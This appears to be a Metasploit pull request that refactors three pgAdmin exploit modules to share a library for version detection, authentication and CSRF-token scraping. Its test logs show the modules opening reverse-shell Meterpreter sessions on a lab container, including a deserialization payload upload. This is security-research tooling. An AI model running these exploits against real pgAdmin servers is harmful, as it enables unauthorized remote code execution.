### PR TITLE
Refactor pgAdmin modules to use new lib

### DIFF
--- a/lib/msf/core/exploit/pgadmin.rb
+++ b/lib/msf/core/exploit/pgadmin.rb
@@ -13,7 +13,7 @@ module Msf
     def auth_required?
       res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)
       if res&.code == 302 && res.headers['Location']['login']
-        true
+        return true
       end
       false
     end

--- a/lib/msf/core/exploit/pgadmin.rb
+++ b/lib/msf/core/exploit/pgadmin.rb
@@ -26,7 +26,7 @@ module Msf
         res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true)
       end
       html_document = res&.get_html_document
-      return unless html_document && html_document.xpath('//title').text == 'pgAdmin 4'
+      return unless html_document&.xpath('//title').text == 'pgAdmin 4'
 
       # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,
       # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27
@@ -63,7 +63,7 @@ module Msf
         @csrf_token = Regexp.last_match(1)
         # at some point between v7.0 and 7.7 the token format changed
       else
-        @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first
+        @csrf_token = res&.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first
       end
     end
 

--- a/lib/msf/core/exploit/pgadmin.rb
+++ b/lib/msf/core/exploit/pgadmin.rb
@@ -14,9 +14,8 @@ module Msf
       res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)
       if res&.code == 302 && res.headers['Location']['login']
         true
-      elsif res&.code == 302 && res.headers['Location']['browser']
-        false
       end
+      false
     end
 
     def get_version
@@ -59,6 +58,9 @@ module Msf
     end
 
     def set_csrf_token_from_config(res)
+
+      # The CSRF token should be inside a java script tag, inside a function called window.renderSecurityPage and should look like:
+      # ImQzYTQ0YzAzOGMyY2YwZWNkMWRkY2Q4ODdhMTA5MGM3YzI5ZTYzY2Ii.Z_6Kdw.XP2eOIJ26MikqG5J8J8W1bDPMpQ
       if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
         @csrf_token = Regexp.last_match(1)
         # at some point between v7.0 and 7.7 the token format changed

--- a/lib/msf/core/exploit/pgadmin.rb
+++ b/lib/msf/core/exploit/pgadmin.rb
@@ -76,7 +76,6 @@ module Msf
       end
     end
 
-
     def authenticate(username, password)
       res = send_request_cgi({
         'uri' => normalize_uri(target_uri.path, 'authenticate/login'),

--- a/lib/msf/core/exploit/pgadmin.rb
+++ b/lib/msf/core/exploit/pgadmin.rb
@@ -10,17 +10,29 @@ module Msf
   module Exploit::PgAdmin
     include Msf::Exploit::Remote::HttpClient
 
+    def auth_required?
+      res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)
+      if res&.code == 302 && res.headers['Location']['login']
+        true
+      elsif res&.code == 302 && res.headers['Location']['browser']
+        false
+      end
+    end
+
     def get_version
-      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
-      return unless res&.code == 200
+      if auth_required?
+        res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
+      else
+        res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true)
+      end
+      html_document = res&.get_html_document
+      return unless html_document && html_document.xpath('//title').text == 'pgAdmin 4'
 
-      html_document = res.get_html_document
-      return unless html_document.xpath('//title').text == 'pgAdmin 4'
-
+      # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,
+      # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27
       versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }
       return unless versioned_link
 
-      set_csrf_token_from_login_page(res)
       Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")
     end
 
@@ -35,19 +47,35 @@ module Msf
     def csrf_token
       return @csrf_token if @csrf_token
 
-      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
-      set_csrf_token_from_login_page(res)
-      fail_with(Msf::Exploit::Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token
+      if auth_required?
+        res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
+        set_csrf_token_from_login_page(res)
+      else
+        res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)
+        set_csrf_token_from_config(res)
+      end
+      fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token
       @csrf_token
+    end
+
+    def set_csrf_token_from_config(res)
+      if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
+        @csrf_token = Regexp.last_match(1)
+        # at some point between v7.0 and 7.7 the token format changed
+      else
+        @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first
+      end
     end
 
     def set_csrf_token_from_login_page(res)
       if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
         @csrf_token = Regexp.last_match(1)
+        # at some point between v7.0 and 7.7 the token format changed
       elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)
         @csrf_token = element['value']
       end
     end
+
 
     def authenticate(username, password)
       res = send_request_cgi({

--- a/modules/exploits/multi/http/pgadmin_session_deserialization.rb
+++ b/modules/exploits/multi/http/pgadmin_session_deserialization.rb
@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   prepend Msf::Exploit::Remote::AutoCheck
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::Remote::SMB::Server::Share
+  include Msf::Exploit::PgAdmin
 
   def initialize(info = {})
     super(
@@ -70,45 +71,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    version = get_version
-    return CheckCode::Unknown('Unable to determine the target version') unless version
-    return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.4')
-
-    CheckCode::Appears("pgAdmin version #{version} is affected")
-  end
-
-  def csrf_token
-    return @csrf_token if @csrf_token
-
-    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
-    set_csrf_token_from_login_page(res)
-    fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token
-    @csrf_token
-  end
-
-  def set_csrf_token_from_login_page(res)
-    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
-      @csrf_token = Regexp.last_match(1)
-    # at some point between v7.0 and 7.7 the token format changed
-    elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)
-      @csrf_token = element['value']
-    end
-  end
-
-  def get_version
-    res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
-    return unless res&.code == 200
-
-    html_document = res.get_html_document
-    return unless html_document.xpath('//title').text == 'pgAdmin 4'
-
-    # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,
-    # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27
-    versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }
-    return unless versioned_link
-
-    set_csrf_token_from_login_page(res) # store the CSRF token because we have it
-    Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")
+    check_version('8.4')
   end
 
   def exploit

--- a/modules/exploits/windows/http/pgadmin_binary_path_api.rb
+++ b/modules/exploits/windows/http/pgadmin_binary_path_api.rb
@@ -10,6 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpClient
   include Msf::Exploit::FileDropper
   include Msf::Exploit::EXE
+  include Msf::Exploit::PgAdmin
 
   def initialize(info = {})
     super(
@@ -60,38 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def check
-    version = get_version
-    return CheckCode::Unknown('Unable to determine the target version') unless version
-    return CheckCode::Safe("pgAdmin version #{version} is not affected") if version >= Rex::Version.new('8.5')
-
-    CheckCode::Vulnerable("pgAdmin version #{version} is affected")
-  end
-
-  def set_csrf_token_from_login_page(res)
-    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
-      @csrf_token = Regexp.last_match(1)
-      # at some point between v7.0 and 7.7 the token format changed
-    elsif (element = res.get_html_document.xpath("//input[@id='csrf_token']")&.first)
-      @csrf_token = element['value']
-    end
-  end
-
-  def set_csrf_token_from_config(res)
-    if res&.code == 200 && res.body =~ /csrfToken": "([\w+.-]+)"/
-      @csrf_token = Regexp.last_match(1)
-      # at some point between v7.0 and 7.7 the token format changed
-    else
-      @csrf_token = res.body.scan(/pgAdmin\['csrf_token'\]\s*=\s*'([^']+)'/)&.flatten&.first
-    end
-  end
-
-  def auth_required?
-    res = send_request_cgi('uri' => normalize_uri(target_uri.path), 'keep_cookies' => true)
-    if res&.code == 302 && res.headers['Location']['login']
-      true
-    elsif res&.code == 302 && res.headers['Location']['browser']
-      false
-    end
+    check_version('8.5')
   end
 
   def on_windows?
@@ -100,37 +70,6 @@ class MetasploitModule < Msf::Exploit::Remote
       platform = res.body.scan(/pgAdmin\['platform'\]\s*=\s*'([^']+)';/)&.flatten&.first
       return platform == 'win32'
     end
-  end
-
-  def get_version
-    if auth_required?
-      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
-    else
-      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/'), 'keep_cookies' => true)
-    end
-    html_document = res&.get_html_document
-    return unless html_document && html_document.xpath('//title').text == 'pgAdmin 4'
-
-    # there's multiple links in the HTML that expose the version number in the [X]XYYZZ,
-    # see: https://github.com/pgadmin-org/pgadmin4/blob/053b1e3d693db987d1c947e1cb34daf842e387b7/web/version.py#L27
-    versioned_link = html_document.xpath('//link').find { |link| link['href'] =~ /\?ver=(\d?\d)(\d\d)(\d\d)/ }
-    return unless versioned_link
-
-    Rex::Version.new("#{Regexp.last_match(1).to_i}.#{Regexp.last_match(2).to_i}.#{Regexp.last_match(3).to_i}")
-  end
-
-  def csrf_token
-    return @csrf_token if @csrf_token
-
-    if auth_required?
-      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'login'), 'keep_cookies' => true)
-      set_csrf_token_from_login_page(res)
-    else
-      res = send_request_cgi('uri' => normalize_uri(target_uri.path, 'browser/js/utils.js'), 'keep_cookies' => true)
-      set_csrf_token_from_config(res)
-    end
-    fail_with(Failure::UnexpectedReply, 'Failed to obtain the CSRF token') unless @csrf_token
-    @csrf_token
   end
 
   def exploit


### PR DESCRIPTION
This refactors the other two pgAdmin modules to use the library introduced in: https://github.com/rapid7/metasploit-framework/pull/20018. It also makes some minor enhancement to the methods in the library.

## Verification

Ensure the 3 modules affected still work as expected:

## Testing
Start a docker container that will be vulnerable to all three modules

```
docker run -d \
  -p 8484:80 \
  -e PGADMIN_DEFAULT_EMAIL=admin@admin.com \
  -e PGADMIN_DEFAULT_PASSWORD=adminpassword \
  --name pgadmin \
  dpage/pgadmin4:8.3
```

Module still works:
```
msf6 exploit(multi/http/pgadmin_query_tool_authenticated) > run db_name=postgres db_user=pgadminuser db_pass=mysecretpassword rhost=127.0.0.1 rport=8484 username=admin@admin.com password=adminpassword lhost=172.16.199.1 MAX_SERVER_ID=10
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 9.0.0 is affected
[+] Successfully authenticated to pgAdmin
[+] Successfully initialized sqleditor
[*] Exploiting the target...
[*] Sending stage (24772 bytes) to 172.16.199.1
[+] Received a 500 response from the exploit attempt, this is expected
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:54127) at 2025-04-11 15:31:26 -0700

meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer     : e9b855f7cda2
OS           : Linux 6.10.14-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Mar 20 16:36:58 UTC 2025
Architecture : x64
Meterpreter  : python/linux
meterpreter >
meterpreter > exit
```

Module still works:
```
msf6 exploit(multi/http/pgadmin_session_deserialization) > run rhost=127.0.0.1 rport=8484 username=admin@admin.com password=adminpassword lhost=172.16.199.1 ssl=false
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Successfully authenticated to pgAdmin
[*] Serialized payload uploaded to: /var/lib/pgadmin/storage/admin_admin.com/dolores.webm
[*] Triggering deserialization for path: ../storage/admin_admin.com/dolores.webm
[*] Sending stage (24772 bytes) to 172.16.199.1
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.1:54353) at 2025-04-11 15:48:15 -0700

meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer     : 4d185a8747be
OS           : Linux 6.10.14-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Mar 20 16:36:58 UTC 2025
Architecture : x64
Meterpreter  : python/linux
meterpreter >
```

Version check and authentication (functionality affected by the refactor) works:
```
msf6 exploit(windows/http/pgadmin_binary_path_api) > run db_name=postgres db_user=pgadminuser db_pass=mysecretpassword rhost=127.0.0.1 rport=8484 username=admin@admin.com password=adminpassword lhost=172.16.199.1 
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 8.3.0 is affected
[*] Successfully authenticated to pgAdmin
[-] Exploit aborted due to failure: bad-config: This exploit is specific to Windows targets!
[*] Exploit completed, but no session was created.
``` 

